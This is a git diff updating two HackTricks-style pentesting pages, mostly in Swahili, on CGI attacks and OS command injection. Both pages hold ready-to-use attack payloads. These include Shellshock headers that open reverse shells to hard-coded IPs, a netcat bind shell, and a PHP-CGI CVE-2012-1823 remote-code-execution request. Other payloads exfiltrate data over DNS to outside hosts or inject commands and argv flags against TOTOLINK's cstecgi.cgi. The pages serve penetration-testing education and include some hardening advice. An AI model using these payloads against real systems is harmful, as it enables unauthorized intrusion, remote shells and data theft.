diff --git a/src/network-services-pentesting/pentesting-web/cgi.md b/src/network-services-pentesting/pentesting-web/cgi.md index 1ffeaa221..0e5d60364 100644 --- a/src/network-services-pentesting/pentesting-web/cgi.md +++ b/src/network-services-pentesting/pentesting-web/cgi.md @@ -1,20 +1,24 @@ +# CGI Pentesting + {{#include ../../banners/hacktricks-training.md}} -# Taarifa -**CGI scripts ni scripts za perl**, hivyo, ikiwa umepata udhibiti wa seva inayoweza kutekeleza _**.cgi**_ scripts unaweza **kupakia shell ya perl reverse** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **badilisha kiambishi** kutoka **.pl** hadi **.cgi**, toa **idhini za kutekeleza** \(`chmod +x`\) na **fikia** shell ya reverse **kutoka kwa kivinjari cha wavuti** ili kuitekeleza. Ili kujaribu **CGI vulns** inashauriwa kutumia `nikto -C all` \(na plugins zote\) +## Maelezo -# **ShellShock** +The **CGI scripts are perl scripts**, hivyo, ikiwa ume-compromise server inayoweza kutekeleza _**.cgi**_ scripts unaweza **kupakia perl reverse shell** \(`/usr/share/webshells/perl/perl-reverse-shell.pl`\), **kubadilisha extension** kutoka **.pl** hadi **.cgi**, kutoa **execute permissions** \(`chmod +x`\) na **kupata** reverse shell **kutoka kwenye web browser** ili kuitekeleza. +Ili kujaribu **CGI vulns** inashauriwa kutumia `nikto -C all` \(and all the plugins\) -**ShellShock** ni **udhaifu** unaoathiri **Bash** shell ya amri inayotumika sana katika mifumo ya uendeshaji ya Unix. Inalenga uwezo wa Bash wa kutekeleza amri zinazopitishwa na programu. Udhaifu huu uko katika udanganyifu wa **mabadiliko ya mazingira**, ambayo ni thamani zenye majina zinazobadilika ambazo zinaathiri jinsi michakato inavyofanya kazi kwenye kompyuta. Washambuliaji wanaweza kutumia hii kwa kuambatanisha **kodhi mbaya** kwenye mabadiliko ya mazingira, ambayo inatekelezwa wanapopokea mabadiliko hayo. Hii inawawezesha washambuliaji kuweza kuathiri mfumo. +## **ShellShock** -Kutatua udhaifu huu **ukurasa unaweza kutoa kosa**. +**ShellShock** ni udhaifu unaoathiri kwa kiasi kikubwa **Bash** command-line shell katika mifumo ya uendeshaji inayotegemea Unix. Unalenga uwezo wa Bash wa kuendesha amri zinazotumwa na applications. Udhaifu upo katika udhibiti wa **environment variables**, ambazo ni thamani zilizopewa majina zinazoendelea (dynamic) ambazo huathiri jinsi michakato inavyotekelezwa kwenye kompyuta. Washambuliaji wanaweza kutumia hili kwa kuambatisha **malicious code** kwenye environment variables, ambayo itaendeshwa wakati variable inapopokelewa. Hii inawawezesha washambuliaji ku-compromise mfumo. -Unaweza **kupata** udhaifu huu kwa kugundua kwamba inatumia **toleo la zamani la Apache** na **cgi_mod** \(ikiwa na folda ya cgi\) au kutumia **nikto**. +Kutumia udhaifu huu, **ukurasa unaweza kurudisha kosa**. -## **Jaribio** +Unaweza **kupata** udhaifu huu ukiangalia kuwa unatumia **old Apache version** na **cgi_mod** \(with cgi folder\) au kwa kutumia **nikto**. -Majaribio mengi yanategemea kutuma kitu na kutarajia kwamba hiyo mistari inarudishwa katika jibu la wavuti. Ikiwa unafikiri ukurasa unaweza kuwa na udhaifu, tafuta kurasa zote za cgi na uzijaribu. +### **Jaribu** + +Vipimo vingi vinategemea ku-echo kitu na kutegemea kwamba mnyororo huo utarudishwa katika majibu ya wavuti. Ikiwa unaamini ukurasa unaweza kuwa dhaifu, tafuta kurasa zote za cgi na uziteste. **Nmap** ```bash @@ -33,7 +37,7 @@ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http: ```bash python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi ``` -## Kutilia +### Exploit ```bash #Bind Shell $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 8 @@ -47,23 +51,57 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' htt > set rhosts 10.1.2.11 > run ``` -# **Proxy \(MitM kwa Maombi ya Web server\)** +## Dispatchers za CGI zilizo katikati (routing ya endpoint moja kupitia selector parameters) -CGI inaunda variable ya mazingira kwa kila kichwa katika ombi la http. Kwa mfano: "host:web.com" inaundwa kama "HTTP_HOST"="web.com" +Mengi ya embedded web UIs huweka pamoja (multiplex) vitendo vingi vyenye ruhusa nyuma ya endpoint moja ya CGI (kwa mfano, `/cgi-bin/cstecgi.cgi`) na hutumia selector parameter kama `topicurl=` ku-routing ombi kwa function ya ndani. -Kama variable ya HTTP_PROXY inaweza kutumika na web server. Jaribu kutuma **kichwa** chenye: "**Proxy: <IP_attacker>:<PORT>**" na ikiwa server itafanya ombi lolote wakati wa kikao. Utaweza kukamata kila ombi lililofanywa na server. +Mbinu za ku-exploit routers hizi: -# Old PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\) +- Enumerate handler names: scrape JS/HTML, brute-force with wordlists, au unpack firmware na grep kwa handler strings zinazotumika na dispatcher. +- Test unauthenticated reachability: baadhi ya handlers husahau auth checks na zinaweza kupatikana moja kwa moja. +- Focus on handlers that invoke system utilities or touch files; weak validators often only block a few characters and might miss the leading hyphen `-`. -Kimsingi ikiwa cgi inafanya kazi na php ni "ya zamani" \(<5.3.12 / < 5.4.2\) unaweza kutekeleza msimbo. -Ili kutumia udhaifu huu unahitaji kufikia faili fulani la PHP la web server bila kutuma vigezo \(hasa bila kutuma herufi "="\). -Kisha, ili kujaribu udhaifu huu, unaweza kufikia kwa mfano `/index.php?-s` \(zingatia `-s`\) na **msimbo wa chanzo wa programu utaonekana katika jibu**. +Generic exploit shapes: +```http +POST /cgi-bin/cstecgi.cgi HTTP/1.1 +Content-Type: application/x-www-form-urlencoded -Kisha, ili kupata **RCE** unaweza kutuma uchunguzi huu maalum: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` na **msimbo wa PHP** utakaotekelezwa katika **mwili wa ombi. Mfano:** +# 1) Option/flag injection (no shell metacharacters): flip argv of downstream tools +topicurl=¶m=-n + +# 2) Parameter-to-shell injection (classic RCE) when a handler concatenates into a shell +topicurl=setEasyMeshAgentCfg&agentName=;id; + +# 3) Validator bypass → arbitrary file write in file-touching handlers +topicurl=setWizardCfg&=/etc/init.d/S99rc +``` +Detection and hardening: + +- Angalia ombi zisizo za kuthibitishwa kwa centralized CGI endpoints zikiwa na `topicurl` imewekwa kwa sensitive handlers. +- Flag vigezo vinavyoanza na `-` (argv option injection attempts). +- Wauzaji: lazimisha authentication kwa state-changing handlers zote, validate kwa kutumia strict allowlists/types/lengths, na kamwe usipitishe user-controlled strings kama command-line flags. + +## PHP ya zamani + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\) + +Kwa ujumla, ikiwa cgi imewezeshwa na php ni "old" \(<5.3.12 / < 5.4.2\) unaweza execute code. +Ili exploit ugani huu unahitaji kufikia faili fulani ya PHP ya web server bila kutuma parameters \(hasa bila kutuma tabia "="\). +Kisha, kwa kujaribu ugani huu, unaweza kufikia kwa mfano `/index.php?-s` \(tazama `-s`\) na **source code ya application itaonekana katika response**. + +Kisha, ili kupata **RCE** unaweza kutuma query maalum: `/?-d allow_url_include=1 -d auto_prepend_file=php://input` na **PHP code** itakayotekelezwa iko katika **body ya request**. +Example: ```bash curl -i --data-binary "" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" ``` -**Maelezo zaidi kuhusu vuln na uwezekano wa exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Andiko Mfano**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.** +**Taarifa zaidi kuhusu vuln na exploits zinazowezekana:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.** +## **Proxy \(MitM to Web server requests\)** + +CGI inaunda environment variable kwa kila header katika http request. Kwa mfano: "host:web.com" inaundwa kama "HTTP_HOST"="web.com" + +Kwa kuwa HTTP_PROXY variable inaweza kutumika na web server. Jaribu kutuma **header** inayoonyesha: "**Proxy: <IP_attacker>:<PORT>**". Ikiwa server itafanya ombi lolote wakati wa session, utaweza kunasa kila ombi litakalo fanywa na server. + +## **Marejeo** + +- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index a7823c01e..01943e882 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -2,13 +2,13 @@ {{#include ../banners/hacktricks-training.md}} -## Command Injection ni nini? +## Je, command Injection ni nini? -A **command injection** inaruhusu mshambulizi kutekeleza amri zozote za mfumo wa uendeshaji kwenye server inayohifadhi programu. Kwa hivyo, programu pamoja na data zake zote zinaweza kuathirika kabisa. Kutekelezwa kwa amri hizi kwa kawaida humruhusu mshambulizi kupata upatikanaji usioidhinishwa au kudhibiti mazingira ya programu na mfumo wa msingi. +A **command injection** inaruhusu utekelezaji wa amri zozote za mfumo wa uendeshaji na mshambuliaji kwenye seva inayoweka application. Kwa matokeo, application na data zake zote zinaweza kuathiriwa/kukomeshwa kabisa. Utekelezaji wa amri hizi kawaida humruhusu mshambuliaji kupata ufikiaji usioidhinishwa au udhibiti wa mazingira ya application na mfumo wa msingi. ### Muktadha -Kutegemea **ambapo pembejeo yako inaingizwa**, unaweza kuhitaji **kumaliza muktadha ulioko ndani ya nukuu** (kwa kutumia `"` au `'`) kabla ya kuingiza amri. +Kutegemea **mahali pembejeo zako zinaingizwa**, huenda ukahitaji **kumaliza muktadha uliomo ndani ya nukuu** (ukitumia `"` au `'`) kabla ya amri. ## Command Injection/Execution ```bash @@ -30,9 +30,9 @@ ls${LS_COLORS:10:1}${IFS}id # Might be useful > /var/www/html/out.txt #Try to redirect the output to a file < /etc/passwd #Try to send some input to the command ``` -### **Vikwazo** Bypasses +### **Kizuizi** Bypasses -Ikiwa unajaribu kutekeleza **arbitrary commands inside a linux machine** utavutiwa kusoma kuhusu haya **Bypasses:** +Ikiwa unajaribu kutekeleza **amri yoyote ndani ya mashine ya linux** utavutiwa kusoma kuhusu **Bypasses** hizi: {{#ref}} @@ -47,7 +47,7 @@ vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod ``` ### Vigezo -Hapa ni vigezo 25 vya juu ambavyo vinaweza kuwa hatarini kwa code injection na udhaifu wa RCE zinazofanana (kutoka [link](https://twitter.com/trbughunters/status/1283133356922884096)): +Hapa kuna vigezo 25 bora vinavyoweza kuwa hatarini kwa code injection na udhaifu za RCE yanayofanana (kutoka [link](https://twitter.com/trbughunters/status/1283133356922884096)): ``` ?cmd={payload} ?exec={payload} @@ -75,7 +75,7 @@ Hapa ni vigezo 25 vya juu ambavyo vinaweza kuwa hatarini kwa code injection na u ?run={payload} ?print={payload} ``` -### Time based data exfiltration +### Utoaji wa data unaotegemea wakati Kutoa data: herufi kwa herufi ``` @@ -91,7 +91,7 @@ sys 0m0.000s ``` ### DNS based data exfiltration -Inategemea zana kutoka `https://github.com/HoLyVieR/dnsbin` pia iliyohifadhiwa kwenye dnsbin.zhack.ca +Inatokana na zana kutoka `https://github.com/HoLyVieR/dnsbin` pia imehifadhiwa kwenye dnsbin.zhack.ca ``` 1. Go to http://dnsbin.zhack.ca/ 2. Execute a simple 'ls' @@ -101,12 +101,12 @@ for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done ``` $(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il) ``` -Zana mtandaoni za kuangalia DNS based data exfiltration: +Zana za mtandaoni za kuangalia kuondolewa kwa data kwa kutumia DNS: - dnsbin.zhack.ca - pingb.in -### Filtering bypass +### Kupita kando kwa vichujio #### Windows ``` @@ -130,9 +130,9 @@ exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(pay /* … */ }); ``` -`exec()` inazindua **shell** (`/bin/sh -c`), kwa hivyo karakteri yoyote ambayo ina maana maalum kwa shell (back-ticks, `;`, `&&`, `|`, `$()`, …) itasababisha **command injection** wakati ingizo la mtumiaji linapounganishwa kwenye string. +`exec()` huanzisha **shell** (`/bin/sh -c`), kwa hivyo herufi/alama yoyote yenye maana maalum kwa shell (back-ticks, `;`, `&&`, `|`, `$()`, …) itasababisha **command injection** wakati pembejeo ya mtumiaji inapoambatanishwa ndani ya string. -**Kupunguza hatari:** tumia `execFile()` (au `spawn()` bila chaguo la `shell`) na utoe **kila argument kama kipengele tofauti cha array** ili shell isihusishwe: +**Kudhibiti:** tumia `execFile()` (au `spawn()` bila chaguo la `shell`) na utoe **kila argument kama kipengele tofauti cha array** ili hakuna shell ihusishwe: ```javascript const { execFile } = require('child_process'); execFile('/usr/bin/do-something', [ @@ -140,9 +140,38 @@ execFile('/usr/bin/do-something', [ '--payload', JSON.stringify(payload) ]); ``` -Kesi halisi: *Synology Photos* ≤ 1.7.0-0794 ilikuwa na udhaifu kupitia tukio la WebSocket lisilothibitishwa ambalo liliweka data iliyodhibitiwa na mshambuliaji kwenye `id_user`, ambayo baadaye iliingizwa katika wito la `exec()`, ikifanikisha RCE (Pwn2Own Ireland 2024). +Real-world case: *Synology Photos* ≤ 1.7.0-0794 ilikuwa inaweza kutumiwa kupitia tukio la WebSocket lisilotambuliwa ambalo liliweka data iliyodhibitiwa na mshambuliaji ndani ya `id_user` ambayo baadaye iliingizwa katika wito wa `exec()`, ikafanikisha RCE (Pwn2Own Ireland 2024). -## Orodha ya Ugunduzi ya Brute-Force +### Uingizaji wa Argument/Option kupitia hyphen ya mwanzoni (argv, no shell metacharacters) + +Si uingizaji wote unahitaji shell metacharacters. Ikiwa programu inapitisha nyimbo zisizotegemewa kama hoja kwa utility ya mfumo (hata kwa `execve`/`execFile` na bila shell), programu nyingi bado zitatafsiri hoja yoyote inaanza na `-` au `--` kama chaguo. Hii inampa mshambuliaji nafasi ya kubadili hali, kubadilisha njia za output, au kuanzisha tabia hatari bila hata kuingia kwenye shell. + +Maeneo yanayojitokeza kawaida: + +- UI za wavuti zilizojengwa/CGI handlers ambazo hujenga amri kama `ping `, `tcpdump -i -w `, `curl `, etc. +- Router za CGI zilizosimamiwa kwa pamoja (mfano, `/cgi-bin/.cgi` na parameter ya selector kama `topicurl=`) ambapo handlers nyingi zinatumia validator dhaifu ile ile. + +Nini cha kujaribu: + +- Toa thamani zinazotangulia na `-`/`--` ili zitumiwe kama flags na zana ya downstream. +- Tumia vibaya flags ambazo hubadilisha tabia au kuandika faili, kwa mfano: +- `ping`: `-f`/`-c 100000` kuumiza kifaa (DoS) +- `curl`: `-o /tmp/x` kuandika njia yoyote, `-K ` kuingiza config inayodhibitiwa na mshambuliaji +- `tcpdump`: `-G 1 -W 1 -z /path/script.sh` kupata utekelezwaji baada ya rotate katika wrappers zisizo salama +- Iki programu inasaidia `--` end-of-options, jaribu kuiepuka mbinu za msingi za kuzuia zinazoweka `--` mahali pasipo sahihi. + +Generic PoC shapes against centralized CGI dispatchers: +``` +POST /cgi-bin/cstecgi.cgi HTTP/1.1 +Content-Type: application/x-www-form-urlencoded + +# Flip options in a downstream tool via argv injection +topicurl=¶m=-n + +# Unauthenticated RCE when a handler concatenates into a shell +topicurl=setEasyMeshAgentCfg&agentName=;id; +``` +## Orodha ya Ugundaji ya Brute-Force {{#ref}} @@ -157,5 +186,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html) - [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php) - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) +- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) {{#include ../banners/hacktricks-training.md}}